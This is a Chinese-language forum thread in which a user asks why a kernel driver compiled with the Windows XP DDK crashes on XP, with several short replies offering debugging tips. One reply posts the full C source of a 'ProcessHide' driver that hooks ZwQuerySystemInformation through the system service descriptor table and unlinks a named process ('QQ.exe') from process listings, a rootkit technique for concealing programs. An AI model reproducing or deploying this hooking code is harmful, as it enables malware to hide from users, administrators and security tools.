|
阅读:1595回复:7
在win2k下装了windows ddk 2600,能不能编译用于xp的内核驱动?
我在win2k下装了winxpddk ,即windows ddk 2600,并对一个内核驱动文件.sys用build -bw直接进行编译,编译显示成功。但把生成的sys文件和复制到winxp后进行加载出现蓝屏。为什么?
注:该内核驱动文件.sys用win2000 ddk编译后在win2k下加载能够正常运行。 |
|
|
沙发#
发布于:2004-08-21 10:55
没有高手能看出其中的错误吗?
|
|
|
板凳#
发布于:2004-08-20 18:44
这是一段用于进程隐藏的代码,能在win2k+win2000DDk下编译并正常运行,但在win2k+winxp ddk下编译正常后却不能在winxp下运行,错误提示为访问。不知道错哪了,大家有兴趣的话可以看一看。
#include "ntddk.h" #include "stdarg.h" #include "stdio.h" //---------------------------------------------------------------------- // DEFINES //---------------------------------------------------------------------- #if DBG #define DbgPrint(arg) DbgPrint arg #else #define DbgPrint(arg) #endif // //32768-65535 are reserved for use by customers // #define FILE_DEVICE_PROCESSHIDE 0x00008306 // //available only on x86 now // #define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)] typedef unsigned long DWORD; typedef unsigned short WORD; typedef int BOOL; // //structure unopen, parameter into ZwQueryDirectoryFile routine. //God bless me it will not be changed.ms is shit... // struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientIs; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; ULONG ThreadState; KWAIT_REASON WaitReason; }; struct _SYSTEM_PROCESSES { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; struct _SYSTEM_THREADS Threads[1]; }; // // Definition for system call service table // typedef struct _SRVTABLE { PVOID *ServiceTable; ULONG LowCall; ULONG HiCall; PVOID *ArgTable; } SRVTABLE, *PSRVTABLE; NTSTATUS (*RealZwQuerySystemInformation)( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); //---------------------------------------------------------------------- // GLOBALS //---------------------------------------------------------------------- // // Pointer to system global service table // PSRVTABLE ServiceTable; extern PSRVTABLE KeServiceDescriptorTable; PDEVICE_OBJECT ControlDeviceObject; //---------------------------------------------------------------------- // FORWARD DEFINES //---------------------------------------------------------------------- NTSTATUS ProcesshideDispatch( IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp ); VOID ProcesshideUnload( IN PDRIVER_OBJECT DriverObject ); NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength ); //====================================================================== // H O O K R O U T I N E S //====================================================================== //---------------------------------------------------------------------- // // HookZwQueryDirectoryFile // //---------------------------------------------------------------------- NTSTATUS HookZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength) { NTSTATUS rc; ANSI_STRING process_name,process_uname,process_name1,process_name2; BOOL g_hide_proc = TRUE; CHAR aProcessName[80]; char aWinlogon[] = "QQ.exe"; int found; // 执行旧的ZwQuerySystemInformation函数 rc =(RealZwQuerySystemInformation)( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength ); if(NT_SUCCESS(rc)) { if( g_hide_proc && (5 == SystemInformationClass)) { // 将查找出来结果赋给结构 struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation; struct _SYSTEM_PROCESSES *prev = NULL; // 遍历进程 while(curr) { RtlUnicodeStringToAnsiString(&process_name,&curr->ProcessName, TRUE); if((0 < process_name.Length) && (255 >process_name.Length)) { found=0; if(RtlCompareMemory(process_name.Buffer,aWinlogon,strlen(aWinlogon)) == strlen(aWinlogon)) { found =1; } // 判断如果是隐藏进程名则覆盖掉此进程名 while(found) { if(prev) { if(curr->NextEntryDelta) { prev->NextEntryDelta +=curr->NextEntryDelta; } else { prev->NextEntryDelta = 0; } } else { if(curr->NextEntryDelta) { (char *)SystemInformation +=curr->NextEntryDelta; } else { SystemInformation = NULL; } } if(curr->NextEntryDelta) { (char *)curr +=curr->NextEntryDelta; } else { curr =NULL; break; } // 遍历链表 found = 0; RtlUnicodeStringToAnsiString(&process_name, &curr->ProcessName, TRUE); if(RtlCompareMemory(process_name.Buffer,aWinlogon,strlen(aWinlogon)) == strlen(aWinlogon)) { found = 1; } } } if(curr != NULL) { prev = curr; if(curr->NextEntryDelta) ((char*)curr += curr->NextEntryDelta); else curr = NULL; } RtlFreeAnsiString(&process_name); } } } return(rc); } //---------------------------------------------------------------------- // // HookRegistry // // Replaces entries in the system service table with pointers to // our own hook routines. We save off the real routine addresses. // //---------------------------------------------------------------------- VOID HookSystemCall( void ) { // // Hook everything // RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation ); SYSCALL( ZwQuerySystemInformation ) = (PVOID)HookZwQuerySystemInformation; } //---------------------------------------------------------------------- // // UnhookZwQueryDirectoryFile // //---------------------------------------------------------------------- VOID UnhookSystemCall( ) { // // Unhook everything // SYSCALL( ZwQuerySystemInformation ) = (PVOID)RealZwQuerySystemInformation; } //---------------------------------------------------------------------- // // FilehideDispatch // //---------------------------------------------------------------------- NTSTATUS ProcesshideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp ) { PIO_STACK_LOCATION irpStack; // // Go ahead and set the request up as successful // Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; // // Get a pointer to the current location in the Irp. This is where // the function codes and parameters are located. // irpStack = IoGetCurrentIrpStackLocation (Irp); switch (irpStack->MajorFunction) { case IRP_MJ_CREATE: DbgPrint(("Processhide: IRP_MJ_CREATE\n")); break; case IRP_MJ_SHUTDOWN: DbgPrint(("Processhide: IRP_MJ_CREATE\n")); break; case IRP_MJ_CLOSE: DbgPrint(("Processhide: IRP_MJ_CLOSE\n")); break; case IRP_MJ_DEVICE_CONTROL: DbgPrint (("Processhide: IRP_MJ_DEVICE_CONTROL\n")); break; } IoCompleteRequest( Irp, IO_NO_INCREMENT ); return STATUS_SUCCESS; } //---------------------------------------------------------------------- // // RegmonUnload // // Our job is done - time to leave. // //---------------------------------------------------------------------- VOID ProcesshideUnload( IN PDRIVER_OBJECT DriverObject ) { WCHAR deviceLinkBuffer[] = L"\\DosDevices\\ProcessHide" ; UNICODE_STRING deviceLinkUnicodeString; DbgPrint(("ProcessHide.SYS: unloading\n")); // // Unhook the registry // UnhookSystemCall(); // // Delete the symbolic link for our device // RtlInitUnicodeString( &deviceLinkUnicodeString,deviceLinkBuffer ); IoDeleteSymbolicLink( &deviceLinkUnicodeString ); // // Delete the device object // IoDeleteDevice( DriverObject->DeviceObject ); DbgPrint(("ProcessHide.SYS: deleted devices\n")); } //---------------------------------------------------------------------- // // DriverEntry // // Installable driver initialization. Here we just set ourselves up. // //---------------------------------------------------------------------- NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath ) { NTSTATUS ntStatus; WCHAR deviceNameBuffer[] = L"\\Device\\ProcessHide"; UNICODE_STRING deviceNameUnicodeString; WCHAR deviceLinkBuffer[] = L"\\DosDevices\\ProcessHide"; UNICODE_STRING deviceLinkUnicodeString; DbgPrint (("my.SYS: entering DriverEntry\n")); // // Setup our name and symbolic link // RtlInitUnicodeString (&deviceNameUnicodeString,deviceNameBuffer ); RtlInitUnicodeString (&deviceLinkUnicodeString,deviceLinkBuffer ); ntStatus = IoCreateDevice ( DriverObject, 0, &deviceNameUnicodeString, FILE_DEVICE_PROCESSHIDE, 0, TRUE, &ControlDeviceObject ); if (NT_SUCCESS(ntStatus)) { // // Create a symbolic link that the GUI can specify to gain access // to this driver/device // ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,&deviceNameUnicodeString ); // // Create dispatch points for all routines that must be handled // DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ProcesshideDispatch; #if DBG DriverObject->DriverUnload = ProcesshideUnload; #endif } if (!NT_SUCCESS(ntStatus)) { DbgPrint(("Processhide: Failed to create our device!\n")); // // Something went wrong, so clean up (free resources etc) // if( ControlDeviceObject ) IoDeleteDevice(ControlDeviceObject ); IoDeleteSymbolicLink( &deviceLinkUnicodeString ); return ntStatus; } // // Pointer to system table data structure is an NTOSKRNL export // ServiceTable = KeServiceDescriptorTable; DbgPrint(("Processhide: Servicetable: %x\n", ServiceTable)); HookSystemCall(); DbgPrint(("Processhide: Hook System Call")); return STATUS_SUCCESS; } |
|
|
地板#
发布于:2004-08-18 15:39
驱动中都是使用UNICODE的所以尽量用WCHAR不要用CHAR
|
|
|
|
地下室#
发布于:2004-08-18 13:56
你把源码贴出来,看看吧,应该是没有问题的.
|
|
|
5楼#
发布于:2004-08-17 19:04
常规应该没问题,代码贴出来看看。 |
|
|
6楼#
发布于:2004-08-17 17:54
常规应该没问题,代码贴出来看看。
|
|
|
|
7楼#
发布于:2004-08-17 17:40
跟踪一下吗,
2000/xp内核都是nt5,应该没问题 |
|
|